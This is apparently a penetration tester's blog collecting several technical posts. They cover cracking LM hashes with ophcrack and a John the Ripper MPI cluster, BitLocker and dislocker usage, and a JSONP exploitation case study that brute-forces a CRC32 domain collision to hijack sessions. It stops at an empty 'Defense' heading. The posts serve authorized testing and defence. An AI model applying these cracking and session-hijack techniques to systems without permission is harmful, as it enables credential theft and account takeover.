ValueError: No JSON object could be decoded

This thoroughly unhelpful error sent me scurrying to Google. Apparently this error is thrown in a variety of situations, but the one relevant to my data was the boolean keywords (True and False): in Python they are capitalised, but in JSON they need to be lowercase. (This error is also thrown when there are trailing commas in lists.)

I used regular expression substitution to implement these alterations. I decided to share these few lines of code for my future self and anyone else who may find it useful. (Note that this worked for my use case, but as soon as exceptions stopped being thrown I moved on. Therefore it may not be a robust or complete solution. You have been warned.)

import re
import json

def load_dirty_json(dirty_json):
    # Substitutions to turn a printed Python structure into valid JSON:
    regex_replace = [
        (r"([ \{,:\[])(u)?'([^']+)'", r'\1"\3"'),  # single quoted (optionally u-prefixed) strings -> double quoted
        (r" False([, \}\]])", r' false\1'),        # Python False -> JSON false
        (r" True([, \}\]])", r' true\1'),          # Python True -> JSON true
    ]
    for r, s in regex_replace:
        dirty_json = re.sub(r, s, dirty_json)
    clean_json = json.loads(dirty_json)
    return clean_json
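
For example (a quick illustration of my own, not from the original data), a printed Python dictionary loads cleanly after the substitutions:

data = "{u'name': u'grimhacker', 'admin': False, 'scores': [1, 2.5, 3]}"
print(load_dirty_json(data))  # prints the parsed dict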

Cracking LM Hashes with Ophcrack – No GUI

Believe it or not, despite the fact that it is 2016, I am still finding LanManager (LM) hashes on internal networks during penetration tests.

In my experience it is becoming more common for LM hashing to have been disabled, and the hashes I am finding are for accounts that have not had their password changed since that time, and which therefore still have the password stored in this weakly protected format.

The LM hash format is weak because the maximum password length it can support is 14 characters, and the password is uppercased, split into two 7-character chunks, and then hashed separately. (Note this is not entirely accurate, but it is sufficient for this post. See here for an accurate description of the LM ‘hashing’ scheme.)
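
To make the weakness concrete, below is a minimal sketch of that first stage (the final step, in which each 7-byte half is used as a DES key to encrypt the constant ‘KGS!@#$%’, is omitted):

def lm_halves(password):
    # Uppercase, pad/truncate to 14 bytes, and split into two independent 7-byte halves.
    padded = password.upper().ljust(14, "\0")[:14]
    return padded[:7], padded[7:]

print(lm_halves("Password123"))  # ('PASSWOR', 'D123\x00\x00\x00') - each half can be attacked separately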

If you find (or are informed) that you have LM password hash storage, you should prevent Windows from storing an LM hash and change all account passwords the number of times required by the password history account option to completely purge the previous LM hashes.

I often use John the Ripper to crack a wide variety of hashes; however, the weaknesses in the LM hash format have allowed Rainbow Tables (aka Lookup Tables) to be created which allow rapid recovery of the plain text password. Ophcrack is an industry favourite tool for cracking LM hashes using rainbow tables. I prefer to use it without the GUI in order to decrease the amount of resources it requires – in fact I have recently started running it on a server I have built for password cracking which does not have a GUI environment, so command line usage is a must.

Since I pretty much always use the same options for Ophcrack I have created a simple bash function to which I can pass the pwdump file containing the hashes I need to crack. It is not pretty, but I have decided to share it in the hope that it will be of some use to others and my future self.

ophcracklm () {
 log=$(echo $1.log)
 outfile=$(echo $1.cracked)
 session=$(echo $1.ophcracklm_session)
 (set -x; ophcrack -g -v -u -n 7 -l $log -o $outfile -S $session -d /path/to/ophcrack_tables/ -t xp_free:xp_special -f $1)
}

This bash function will create log, output file, and session file names based on the hash file name passed to it, enable debugging mode in a subshell of bash, and run ophcrack with the following options:

-g disable GUI
-v verbose output
-u display statistics when cracking ends
-n number of threads (I have this set to 7 for my machine, you may need to change it to suit)
-l log all output to the file name created based on the input file name
-o output cracked hashes, in the pwdump format, to the file name created based on the input file name
-S save progress of the search to the file name created based on the input filename
-d base directory containing the tables
-t tables to use separated by colons
-f the file to load the hashes from ($1, the first argument passed to the function)

Note that I am using bash’s debug output in order to echo the command that will be executed, and I am doing this in a subshell because the setting is automatically reverted when the subshell exits.


As always, if you have any questions, comments or suggestions please feel free to get in touch.

Installing a John the Ripper Cluster (Fedora 23/24)

John the Ripper is an excellent password cracking tool that I regularly use during penetration tests to recover plaintext passwords from multiple hash formats.

I recently started building a new dedicated rig with the sole purpose of cracking passwords. I didn’t have any money to invest in this project, so I am using whatever servers and workstations are lying around unused in the back of the server room. I therefore decided my best bet for maximum hash cracking goodness would be to use John in parallel across all these machines. This is a first for me, so I thought I had better document how I did it for when it all burns to the ground and I have to start again. There are several guides online describing how to achieve this kind of setup using Kali or Ubuntu, but I prefer Fedora so I had to alter a lot of the commands to suit, and I encountered some odd errors along the way. I hope this (rambling) guide is useful to others as well as my future self.

[Note this post is a little bit of a work in progress as I continue to build and refine the cracking rig.]

I’m using Fedora 23 Server on each of the hosts, have configured a static IP address using the Cockpit interface on port 9090 (i.e. https://ip_address:9090), and have created a user which will be used to authenticate between the hosts.

[Update: I have successfully used the same process on Fedora 24]

On a side note, if you encounter an error like the following when running dnf commands:

Error: Failed to synchronize cache for repo 'updates' from 'https://mirrors.fedoraproject.org/metalink?repo=updates-released-f23&arch=x86_64': Cannot prepare internal mirrorlist: Curl error (60): Peer certificate cannot be authenticated with given CA certificates for https://mirrors.fedoraproject.org/metalink?repo=updates-released-f23&arch=x86_64 [Peer's Certificate has expired.]

You may not have access to the Internet because your network firewall/proxy is trying to MITM the connection – in my case I fixed this by shouting over to the firewall guy in the office.

As I need support for a large variety of hash formats, the version of John in the Fedora repositories is useless to me; instead I am using the community enhanced edition.

Compiling John

Non-clustered

There are several dependencies that you need before attempting to build:

sudo dnf install openssl openssl-devel gcc

I first tried to install this from the tarball available on the openwall site. However when running:

cd src/
./configure && make

I encountered some errors like this:

In file included from /usr/include/stdio.h:27:0,
 from jumbo.h:20,
 from os-autoconf.h:29,
 from os.h:20,
 from bench.c:25:
 /usr/include/features.h:148:3: warning: #warning "_BSD_SOURCE and _SVID_SOURCE are deprecated, use _DEFAULT_SOURCE" [-Wcpp]
 # warning "_BSD_SOURCE and _SVID_SOURCE are deprecated, use _DEFAULT_SOURCE"
 ^
 gpg2john.c: In function ‘pkt_type’:
 gpg2john.c:1194:7: warning: type of ‘tag’ defaults to ‘int’ [-Wimplicit-int]
 char *pkt_type(tag) {
 ^
 /usr/bin/ar: creating aes.a
 dynamic_fmt.o: In function `DynamicFunc__crypt_md5_to_input_raw_Overwrite_NoLen':
 /opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4989: undefined reference to `MD5_body_for_thread'
 dynamic_fmt.o: In function `DynamicFunc__crypt_md5':
 /opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4425: undefined reference to `MD5_body_for_thread'
 dynamic_fmt.o: In function `DynamicFunc__crypt_md5_in1_to_out2':
 /opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4732: undefined reference to `MD5_body_for_thread'
 dynamic_fmt.o: In function `DynamicFunc__crypt_md5_to_input_raw':
 /opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4903: undefined reference to `MD5_body_for_thread'
 dynamic_fmt.o: In function `DynamicFunc__crypt_md5_to_input_raw_Overwrite_NoLen_but_setlen_in_SSE':
 /opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4946: undefined reference to `MD5_body_for_thread'
 dynamic_fmt.o:/opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4817: more undefined references to `MD5_body_for_thread' follow
 collect2: error: ld returned 1 exit status
 Makefile:294: recipe for target '../run/john' failed
 make[1]: *** [../run/john] Error 1
 Makefile:185: recipe for target 'default' failed
 make: *** [default] Error 2

I have no idea why this is and could not find out how to fix it; however, I did discover that the version on GitHub is not affected by this problem.

sudo dnf install git
git clone https://github.com/magnumripper/JohnTheRipper.git
cd JohnTheRipper/src
./configure && make -s clean && make -s

You should now be able to use John:

cd ../run
./john --test

This gives a useable version of John for a single machine, but it will not work for a cluster.

Clustered (openmpi support)

For a cluster we need openmpi support.

First install the dependencies:

sudo dnf install openssl openssl-devel gcc openmpi openmpi-devel mpich

If you now try to build with openmpi support:

cd src/
./configure --enable-mpi && make -s clean && make -s

You will probably encounter an error like this:

checking build system type... x86_64-unknown-linux-gnu
 checking host system type... x86_64-unknown-linux-gnu
 checking whether to compile using MPI... yes
 checking for mpicc... no
 checking for mpixlc_r... no
 checking for mpixlc... no
 checking for hcc... no
 checking for mpxlc_r... no
 checking for mpxlc... no
 checking for sxmpicc... no
 checking for mpifcc... no
 checking for mpgcc... no
 checking for mpcc... no
 checking for cmpicc... no
 checking for cc... cc
 checking for gcc... (cached) cc
 checking whether the C compiler works... yes
 checking for C compiler default output file name... a.out
 checking for suffix of executables...
 checking whether we are cross compiling... no
 checking for suffix of object files... o
 checking whether we are using the GNU C compiler... yes
 checking whether cc accepts -g... yes
 checking for cc option to accept ISO C89... none needed
 checking whether cc understands -c and -o together... yes
 checking for function MPI_Init... no
 checking for function MPI_Init in -lmpi... no
 checking for function MPI_Init in -lmpich... no
 configure: error: in `/opt/john/JohnTheRipper/src':
 configure: error: No MPI compiler found
 See `config.log' for more details

The error here is that the MPI compiler and its libraries (which we installed previously) cannot be found because they are installed to a directory that is not in your PATH.

To fix this temporarily:

export PATH=$PATH:/usr/lib64/openmpi/bin
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib64/openmpi/lib

To fix more permanently add the following to your ~/.bashrc

PATH=$PATH:/usr/lib64/openmpi/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib64/openmpi/lib

You should now be able to build John with openmpi support:

./configure --enable-mpi && make -s clean && make -s

Setting up the cluster

Now that we know how to get John installed successfully with openmpi support on Fedora Server 23, it’s time to setup the other services required to allow hashes to be cracked as part of a cluster.

In the example commands below, the master node is 192.168.0.1 and the slave node is 192.168.0.2.

EDIT: [I have recently noticed that ALL nodes need to be able to authenticate to and communicate with EVERY other node, once the number of nodes passes a certain number. Therefore every node must have an SSH key, with the public key in the authorized_keys file on every other node, and firewall rules allowing traffic between all nodes. I will find out how to automate this process and update this post in the future.]

Setup SSH Keys

On the master node generate an SSH key. The following command will prevent the passphrase prompt from appearing and set the key-pair to be stored in plaintext (this is not very secure and I will be changing it to a more secure option in the near future; however, since this key is only going to be used to access the slave nodes, and I am the only user on the box, it will do for now…):

ssh-keygen -b 2048 -t rsa -f ~/.ssh/id_rsa -q -N ""

Issue the following command on the master node to copy the ssh key to the authorized_keys file for the user of the slave node:

ssh-copy-id -i ~/.ssh/id_rsa.pub username@192.168.0.2

Note it is easiest if the user account on all of the nodes has the same name; however, I believe it is possible to use different usernames (and keys) provided the ~/.ssh/config file has appropriate entries.

Ensure the permissions on the slave node are correct if you are having trouble using your key:

chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh

And make sure that selinux is not getting in the way (again on the slave node):

restorecon -R -v ~/.ssh

Setup NFS

We will use an NFS share to store files that need to be shared between the nodes, for example the john.pot file and any wordlists we wish to use.

NFS and RPCBind are already installed in Fedora Server; they just need some configuration.

Make a directory to use as the nfs share on the master node and change the ownership to the user account we are using:

sudo mkdir /var/johnshare
sudo chown -R username /var/johnshare

Add this directory to the list of “exports”. Note that using ‘*’ in place of the host (in this case ‘192.168.0.2’) is a security vulnerability, as it would allow ANY host to mount the share. It should also be noted that any user on 192.168.0.2 will be able to mount this share; in this case that is not a serious issue since I have sole control over the node. (Information about securing NFS can be found here.)

sudo vim /etc/exports
/var/johnshare  192.168.0.2(rw,sync)

Start exporting this directory and start the service:

sudo exportfs -a
sudo systemctl start nfs

At this point you should be able to see the export on localhost:

showmount -e 127.0.0.1
Export list for 127.0.0.1:
/var/johnshare 192.168.0.2

But if you try it from the slave node you will get the error:

clnt_create: RPC: Port mapper failure - Unable to receive: errno 113 (No route to host)

This is because the ports are not open on the firewall of the master node. The following commands will reconfigure the firewall to allow the services we need (on the master node):

firewall-cmd --permanent --add-service=nfs
firewall-cmd --permanent --add-service=mountd
firewall-cmd --permanent --add-service=rpc-bind
firewall-cmd --reload

Note that the above commands will open several ports through your firewall to ANY host. While this is often not too much of a concern on an internal trusted network, ideally you should limit the rule to only the hosts required (see below).

Mount the NFS Share on the Nodes

Make a directory on the slave node to mount the NFS share onto, and change the ownership to the user we are using:

sudo mkdir /var/johnshare
sudo chown -R username /var/johnshare

You could mount the nfs share manually using the following command:

sudo mount 192.168.0.1:/var/johnshare /var/johnshare

However this will not survive a reboot. Instead you could use /etc/fstab as described here, but apparently using autofs is more efficient.

Add the following configuration file to the slave node to use autofs:

cat /etc/auto.john
/var/johnshare -fstype=nfs 192.168.0.1:/var/johnshare

Edit file /etc/auto.master on the slave node and add the line:

/- /etc/auto.john

Start the automount service to mount the share and start it at boot:

sudo systemctl start autofs
sudo systemctl enable autofs

Mpiexec Firewall Rules

Ideally we would add specific ports for mpiexec to the firewall configuration; however, a large number of ports are used for communication and they are dynamically assigned. According to the documentation and mailing lists it should be possible to restrict the range of ports that will be used and then allow these through the firewall; unfortunately, during my setup I was unable to accomplish this. Unwilling to fall back to turning off the firewall permanently out of frustration, I decided to go for the middle ground of allowing all ports, but only to specific hosts. While this is not as granular as I would like, it is certainly more secure than no firewall at all.

sudo firewall-cmd --add-rich-rule 'rule family="ipv4" source address="192.168.0.2/32" accept'
sudo firewall-cmd --reload

Enter the same commands on the slave node, substituting the IP address.

[Update: it is possible to restrict the ports mpiexec uses by entering the following configuration into /etc/openmpi-x86_64/openmpi-mca-params.conf on all of the nodes:

oob_tcp_port_min_v4 = 10000
oob_tcp_port_range_v4 = 100
btl_tcp_port_min_v4 = 10000
btl_tcp_port_range_v4 = 100

This will make mpiexec use TCP ports 10000 to 10100, and you can therefore restrict the firewall configuration by both host and ports to minimise the attack surface. Note that as more nodes are added more ports may be required.]

You can test that your openmpi installation is working by issuing the following command on the master node:

mpiexec -n 1 -host 192.168.0.2 hostname

If all is well you should see the hostname of the slave node. If you see something like this:

ORTE was unable to reliably start one or more daemons.
This usually is caused by:
* not finding the required libraries and/or binaries on
 one or more nodes. Please check your PATH and LD_LIBRARY_PATH
 settings, or configure OMPI with --enable-orterun-prefix-by-default
* lack of authority to execute on one or more specified nodes.
 Please verify your allocation and authorities.
* the inability to write startup files into /tmp (--tmpdir/orte_tmpdir_base).
 Please check with your sys admin to determine the correct location to use.
* compilation of the orted with dynamic libraries when static are required
 (e.g., on Cray). Please check your configure cmd line and consider using
 one of the contrib/platform definitions for your system type.
* an inability to create a connection back to mpirun due to a
 lack of common network interfaces and/or no route found between
 them. Please check network connectivity (including firewalls
 and network routing requirements).

Then, as the error indicates, you have a problem that could have multiple causes; however, the one that I encountered was the local firewall blocking the unsolicited connection from the remote node. Ensure you have added appropriate allow rules and either issued the reload command or restarted the service.

Install John on the Slave Node

Assign a static IP address and add the SSH key (ensure it is possible to authenticate with the key). Follow the steps above to install the dependencies, clone John from the repo, and build it (note that slave nodes also require openmpi). Ensure that it is in the same path as on the other nodes. Configure and start autofs.

Running John Across the Cluster

On the master node, create a list of nodes and the number of available cores on each:

cat nodes.txt
192.168.0.1 slots=8
192.168.0.2 slots=8

To run John on the configured nodes from the master node:

mpiexec -display-map -tag-output -hostfile nodes.txt ./john /var/johnshare/hashes.pwdump --format=nt --pot=/var/johnshare/john.pot --session=/var/johnshare/my_session_name

The -display-map parameter will output a map of the processes and the nodes they are running on at the start of the job; -tag-output will prefix every line of output from the program with the job id and the node number. I find this information helpful, however if you prefer less verbose output they can be omitted.

Note, it is important that the session file is accessible by all nodes (i.e. it must be on the NFS share) otherwise it will not be possible to resume a crashed/cancelled session. If you do not store the session file on the share, you will see an error like the one below from each of the cores on each of your slave nodes, but the session will resume on the master node:

9@192.168.0.2: fopen: my_session_name.rec: No such file or directory
8@192.168.0.2: fopen: my_session_name.rec: No such file or directory

Another error that you may encounter is:

9@192.168.0.2: 8@192.168.0.2: [192.168.0.2:28647] *** Process received signal ***
[192.168.0.2:28647] Signal: Segmentation fault (11)
[192.168.0.2:28647] Signal code: Address not mapped (1)
[192.168.0.2:28647] Failing at address: 0x1825048b64c4
[192.168.0.2:28648] *** Process received signal ***
[192.168.0.2:28648] Signal: Segmentation fault (11)
[192.168.0.2:28648] Signal code: Address not mapped (1)
[192.168.0.2:28648] Failing at address: 0x1825048b64c4
[192.168.0.2:28647] [ 0] /lib64/libpthread.so.0(+0x109f0)[0x7f504ffb19f0]
[192.168.0.2:28647] [ 1] /lib64/libc.so.6(_IO_vfprintf+0xaef)[0x7f504fc2c38f]
[192.168.0.2:28647] [ 2] /lib64/libc.so.6(+0x4e441)[0x7f504fc2e441]
[192.168.0.2:28647] [ 3] /lib64/libc.so.6(_IO_vfprintf+0x1bd)[0x7f504fc2ba5d]
[192.168.0.2:28647] [ 4] /opt/john/JohnTheRipper/run/john[0x6354eb]
[192.168.0.2:28647] [ 5] /opt/john/JohnTheRipper/run/john[0x625b03]
[192.168.0.2:28647] [ 6] /opt/john/JohnTheRipper/run/john[0x6237cb]
[192.168.0.2:28647] [ 7] /opt/john/JohnTheRipper/run/john[0x624227]
[192.168.0.2:28647] [ 8] /opt/john/JohnTheRipper/run/john[0x62516c]
[192.168.0.2:28647] [ 9] /lib64/libc.so.6(__libc_start_main+0xf0)[0x7f504fc00580]
[192.168.0.2:28647] [10] /opt/john/JohnTheRipper/run/john[0x4065a9]
[192.168.0.2:28647] *** End of error message ***
[192.168.0.2:28648] [ 0] /lib64/libpthread.so.0(+0x109f0)[0x7f386381b9f0]
[192.168.0.2:28648] [ 1] /lib64/libc.so.6(_IO_vfprintf+0xaef)[0x7f386349638f]
[192.168.0.2:28648] [ 2] /lib64/libc.so.6(+0x4e441)[0x7f3863498441]
[192.168.0.2:28648] [ 3] /lib64/libc.so.6(_IO_vfprintf+0x1bd)[0x7f3863495a5d]
[192.168.0.2:28648] [ 4] /opt/john/JohnTheRipper/run/john[0x6354eb]
[192.168.0.2:28648] [ 5] /opt/john/JohnTheRipper/run/john[0x625b03]
[192.168.0.2:28648] [ 6] /opt/john/JohnTheRipper/run/john[0x6237cb]
[192.168.0.2:28648] [ 7] /opt/john/JohnTheRipper/run/john[0x624227]
[192.168.0.2:28648] [ 8] /opt/john/JohnTheRipper/run/john[0x62516c]
[192.168.0.2:28648] [ 9] /lib64/libc.so.6(__libc_start_main+0xf0)[0x7f386346a580]
[192.168.0.2:28648] [10] /opt/john/JohnTheRipper/run/john[0x4065a9]
[192.168.0.2:28648] *** End of error message ***
Session aborted
3 0g 0:00:00:02 0.00% (ETA: Wed 09 Jul 2031 01:57:37 BST) 0g/s 0p/s 0c/s 0C/s
4 0g 0:00:00:02 0.02% (ETA: 00:00:21) 0g/s 305045p/s 305045c/s 859007KC/s bear902..zephyr902
[192.168.0.1][[28350,1],3][btl_tcp_endpoint.c:818:mca_btl_tcp_endpoint_complete_connect] connect() to 192.168.0.2 failed: Connection refused (111)
5 0g 0:00:00:04 0.37% (ETA: 21:56:45) 0g/s 2599Kp/s 2599Kc/s 7557MC/s 47886406..M1911a16406
[192.168.0.1][[28350,1],4][btl_tcp_endpoint.c:818:mca_btl_tcp_endpoint_complete_connect] connect() to 192.168.0.2 failed: Connection refused (111)
6 0g 0:00:00:06 0.78% (ETA: 21:51:27) 0g/s 3527Kp/s 3527Kc/s 10677MC/s skyler.&01..virgil.&01
[192.168.0.1][[28350,1],5][btl_tcp_endpoint.c:818:mca_btl_tcp_endpoint_complete_connect] connect() to 192.168.0.2 failed: Connection refused (111)
7 0g 0:00:00:08 1.12% (ETA: 21:50:34) 0g/s 3873Kp/s 3873Kc/s 11466MC/s Angie18%$..Cruise18%$
[192.168.0.1][[28350,1],6][btl_tcp_endpoint.c:818:mca_btl_tcp_endpoint_complete_connect] connect() to 192.168.0.2 failed: Connection refused (111)
--------------------------------------------------------------------------
mpiexec noticed that process rank 7 with PID 0 on node 192.168.0.2 exited on signal 11 (Segmentation fault).
--------------------------------------------------------------------------

In my experience this extremely unhelpful error means that the slave node cannot access the NFS share. I first encountered this when a slave node rebooted and I learned that I had not enabled autofs to start on boot.

You can get each process to output its status by sending the USR1 signal using pkill (you should also run this command before cancelling a session to ensure that as little work as possible is lost):

pkill -USR1 mpiexec

You can force a pot sync to stop other nodes from working on hashes and salts that have already been cracked by sending the USR2 signal:

pkill -USR2 mpiexec

Adding New Nodes

Follow the same process as above: add the SSH public key of the master node to the new slave node, install John with openmpi support, configure autofs to mount the NFS share, add the new node to the /etc/exports file and to the node list on the master node, restrict the ports in use if required, and add the firewall rules on the master and slave nodes to allow full access between them.

More Troubleshooting

After adding some nodes to my cluster and running some jobs I started to find that long running tasks (such as running john with a large wordlist and some complex rules) hung with the following error:

mca_btl_tcp_frag_recv: readv failed: Connection timed out

The Google results I found for this error mostly discussed cases where it was encountered at the start of a job, often as the result of host based firewalling errors. These did not seem relevant to my situation, since the task completed its work but then hung on this error instead of exiting.

A quirk of my cluster is that it is distributed around a network rather than sitting on its own network segment, as is recommended for MPI clusters. This means that the connections between the nodes pass through a firewall, and although the required ports are allowed, the firewall turned out to be the cause of my problem.

The idle connection timeout on the firewall rule was configured to the default of 180 seconds; increasing this to 86400 seconds (1 day) resolved the issue.

My best guess for why this is the case is that the connection is established at the start of the job but then remains idle until a hash is cracked, so on long running jobs the idle timeout is exceeded and the firewall terminates the connection. I would have expected the program to re-establish the connection when it needs to use it again, but this does not appear to be the case and it instead times out trying to use its existing (terminated) connection.

Obviously a better solution would be to move the nodes onto the same network to remove the firewall from the equation, but unfortunately that isn’t an option right now.


As always, if you have any questions, comments or suggestions please feel free to get in touch.

Using BitLocker To Go on Fedora 23 (dislocker)

I have multiple machines, some run Windows and some run Fedora. I also need to keep a significant amount of my data encrypted, and I need to be able to access it from Windows machines that are not under my control.

Both Windows and Linux have multiple encryption solutions available, with varying levels of uptake and acceptance. However in order to be as compatible as possible for my clients, I decided to use a Windows solution and figure out how to use it on Linux.

BitLocker is the obvious choice for Windows compatibility. Enabling BitLocker on a USB stick includes the executables required to mount the volume on any Windows machine.

Dislocker can be used on Linux systems to mount the BitLocker volume; although this tool was initially read only, it now supports read/write. (Note that I have only tried this using exFAT formatted drives, however I believe FAT and NTFS will also work.)

The following is my cheat sheet of how to install and use dislocker.

Note: All commands as root

Installing dislocker

Install exfat support

dnf install exfat-utils fuse-exfat

At the moment we need to enable the testing repo so that we can get a version of dislocker that supports USB drives (at least v0.5 is needed). [You could also install from source…]

dnf config-manager --set-enabled updates-testing

Install dislocker

dnf install dislocker fuse-dislocker

Disable the testing repo so that we aren’t getting any other unstable packages when we install

dnf config-manager --set-disabled updates-testing

 

Make a mount point for the dislocker container

mkdir /mnt/dislocker-container

Make a mount point for the dislocker file

mkdir /mnt/dislocker

 

Mounting a BitLocker USB device

Find the USB device, probably /dev/sdc1 or similar

fdisk -l

Mount the dislocker container (assuming /dev/sdc1 is the USB device) using the user password you configured when you set up BitLocker (you will be prompted). Note that recovery passwords and key files are also supported.

dislocker -v -V /dev/sdc1 -u -- /mnt/dislocker-container

Make sure that this has worked correctly; a file named 'dislocker-file' should be within that directory.

ls /mnt/dislocker-container/dislocker-file

Mount the dislocker-file as a loop device and give everyone permission to write to it (you may want to restrict this more…)

mount -o loop,umask=0,uid=nobody,gid=nobody /mnt/dislocker-container/dislocker-file /mnt/dislocker

That's it!
Work on the files in /mnt/dislocker; you should have read/write access (for all users).

Common Errors:

Some error about /mnt/dislocker-container already existing: you don't have fuse-dislocker installed, so dislocker is trying to create an unencrypted copy of the USB volume.

It's taking ages and running out of disk space: same as above, it's trying to make an unencrypted copy of your volume.

Unmounting

Make sure you aren't in the directories you need to unmount or the unmount will fail

cd /mnt

Unmount the dislocker-file mount point

umount /mnt/dislocker

Unmount the dislocker container mount point

umount /mnt/dislocker-container

Eject the USB device using the file manager on the system.

Done!


As always, if you have any comments or suggestions please feel free to get in touch.

Change the TPM Owner Password and BitLocker Recovery Key

I recently purchased a Microsoft Surface Pro 4 which came with Windows 10. BitLocker was enabled by default during setup, however the recovery key was automatically uploaded to my Microsoft account. While this is a really good feature and for the vast majority of users will not pose a problem, I have slightly different concerns than the average user… therefore I decided I did not want my recovery key to be entrusted to Microsoft.

The quickest and easiest option was to delete the recovery key from my Microsoft account, which can be done here. However, although this would remove my ability to get my recovery key from my Microsoft account, it gives me absolutely no guarantee that Microsoft actually deleted it in any kind of permanent way, and given that everyone has a rigorous backup process (right? 😉 ), it is very likely that they still have my recovery key.

To have slightly more confidence I decided to change both the TPM Owner Password and BitLocker Recovery Key on my machine and keep them in a safe place offline in case I ever needed them.

To change the TPM Owner Password, open tpm.msc and select "Change Owner Password…" in the top right. I followed the prompts within the dialogue box to change the password and save the file to external media.

Changing the BitLocker Recovery Key is slightly more involved and utilises the BitLocker Drive Encryption Configuration Tool:

manage-bde

Assuming C: is the BitLocker protected drive whose recovery password you want to change, do the following within an elevated command prompt.

List the recovery passwords:

 manage-bde C: -protectors -get -type RecoveryPassword

Locate which protector you want to change, there is probably only one, and copy its ID field including the curly braces.

Delete this protector:

manage-bde C: -protectors -delete -id [ID you copied]

Create a new protector:

manage-bde C: -protectors -add -rp

Note that you can specify a 48 digit password at the end of the previous command if you wish; however, if one is not specified, one is randomly generated for you. Computers are much better at randomly generating passwords than you are, so it is probably best to let it do it.

Take heed of the output of the last command:

ACTIONS REQUIRED:

1. Save this numerical recovery password in a secure location away from your computer:

[YOUR RECOVERY KEY IS HERE]

To prevent data loss, save this password immediately. This password helps ensure that you can unlock the encrypted volume.

As always, if you have any comments or suggestions please feel free to get in touch.

Exploiting JSONP

JavaScript Object Notation with Padding (JSONP) is a technique created by web developers to bypass the Same Origin Policy, which is enforced by browsers to prevent one web application from retrieving information from others. JSONP takes advantage of the fact that, in the eyes of the browser, not all resources are created equal: JavaScript, images and a few other types can be loaded cross domain.

In order to pass data cross domain, JSONP "smuggles" it within JavaScript and utilises a callback. That is, the receiving domain includes a script tag with the source attribute set to a specific URL on the sending domain. The script returned by the sending domain contains the data that needs to be sent cross domain and passes it to a function defined by the receiving domain. The function on the receiving domain then parses the data and uses it as required.
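
As a rough sketch of what this looks like on the wire (the endpoint, callback name and token below are made-up examples, not taken from any real application), the sending domain simply returns JavaScript that calls the receiving page's function with the data as its argument. A few lines of Python can mimic such a response:

import json

def jsonp_response(callback_name, data):
    # Build a JSONP response body: the data wrapped in a call to the
    # callback function named by the requesting page.
    return "{}({});".format(callback_name, json.dumps(data))

# The receiving page would include something like:
#   <script src="https://sso.example.com/token?callback=handleToken"></script>
# and the browser would execute the returned handleToken({...}) in that page.
print(jsonp_response("handleToken", {"session_token": "abc123"}))
# -> handleToken({"session_token": "abc123"});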

While this all sounds perfectly innocent, it easily becomes a security vulnerability when you remember that it is often sensitive data, for example session tokens, that is passed between domains. Since this abuses the behavior of the Same Origin Policy, there is no built in or standardized security mechanism which may be used to ensure the receiving domain is the intended one.

Depending on the exact usage of JSONP, the vulnerability may result in sensitive information disclosure, Cross Site Scripting, Cross Site Request Forgery, or Reflected File Download. I have most often seen JSONP being used to implement a Single Sign On system, where insufficient validation of the receiving domain means that exploitation results in session hijacking or account takeover.

In the simplest instance, no validation is performed and exploitation is as simple as including the script from the sending domain within the attacker's site and persuading a user of the sending application to visit the attacker's site.

However there are more complex instances where the web developer has attempted to prevent the data being passed to malicious domains. This can take a variety of forms but is often incomplete whether on the client side or the server side.

Anonymous Case Study

On a recent web application test I encountered a single sign on system utilising JSONP which enforced server side checks on the HTTP Referer header before returning the script containing the session token; the script itself also performed client side checks on the document.domain property before passing the token to the JavaScript function. However, both of these pieces of validation were flawed, so it was possible to hijack the user's session, and with further work I believe it would have resulted in full account takeover.

The server side validation consisted of a check of the requesting domain against a regular expression; however, as is often the case, the developers overlooked the fact that an unescaped "." in a regular expression is a wildcard that matches any character. So although the developer only intended to allow "www.somedomain.co.uk", the wildcard meant that "wwwXsomedomainXcoXuk" would also pass validation (I also identified that any subdomain was allowed, i.e. "XXXX.wwwXsomedomainXcoXuk"). Remember, though, that it also had to be a valid domain, so the final dot needed to be an actual dot; there were obviously many domains that could be registered to meet these requirements.
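
A minimal demonstration in Python (the pattern below is an illustrative guess at the shape of the flawed check, not the application's actual expression):

import re

# Unescaped dots act as wildcards; the developer intended to allow only
# www.somedomain.co.uk and its subdomains.
flawed = re.compile(r"^(.+\.)?www.somedomain.co.uk$")

print(bool(flawed.match("www.somedomain.co.uk")))       # True (intended)
print(bool(flawed.match("wwwXsomedomainXco.uk")))       # True (registrable look-alike)
print(bool(flawed.match("evil.wwwXsomedomainXco.uk")))  # True (any subdomain too)
# Escaping the dots, e.g. r"^([a-z0-9-]+\.)?www\.somedomain\.co\.uk$", closes the hole.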

The client side validation was significantly more unusual: it consisted of taking a CRC32 hash of document.domain and comparing it to a list of approved values. However, due to the limited size of the hash (32 bits), it is a mathematical certainty that multiple domains exist which would result in the same hash and therefore pass validation.

In order to exploit this usage of JSONP I needed to pass both the server and client side validation. To do this I decided to write a Python script to iterate through all the permutations that would pass the regular expression in order to identify one that would also pass the CRC32 validation. (Unfortunately this script cannot be released at this time, but I hope to share it in the future as it could be useful to others.)
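
While that script can't be shared, the general approach can be sketched as follows; the target CRC32 value, character set and candidate domain shapes below are hypothetical placeholders, and the CRC32 variant would need to match whatever the client side JavaScript actually implements:

import itertools
import string
import zlib

# Placeholder for one of the CRC32 values on the client side allow list.
TARGET_CRC = 0x12345678

def candidates():
    # Yield registrable look-alike domains that satisfy the flawed regular
    # expression: each wildcard dot replaced by an arbitrary character,
    # with the final dot kept real.
    charset = string.ascii_lowercase + string.digits
    for a, b in itertools.product(charset, repeat=2):
        yield "www{}somedomain{}co.uk".format(a, b)
    # Arbitrary subdomain labels were also allowed, which hugely expands the space.
    for a, b in itertools.product(charset, repeat=2):
        for label in map("".join, itertools.product(charset, repeat=4)):
            yield "{}.www{}somedomain{}co.uk".format(label, a, b)

def find_collision(target, limit=1000000):
    # Cap the demo run; the real search reportedly needed over 1.6 billion candidates.
    for domain in itertools.islice(candidates(), limit):
        if zlib.crc32(domain.encode()) == target:
            return domain
    return None

print(find_collision(TARGET_CRC))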

It took over 1.6 billion permutations, but I eventually identified a valid domain and was able to register it and exploit the flawed JSONP validation to hijack a user's session.

Defense

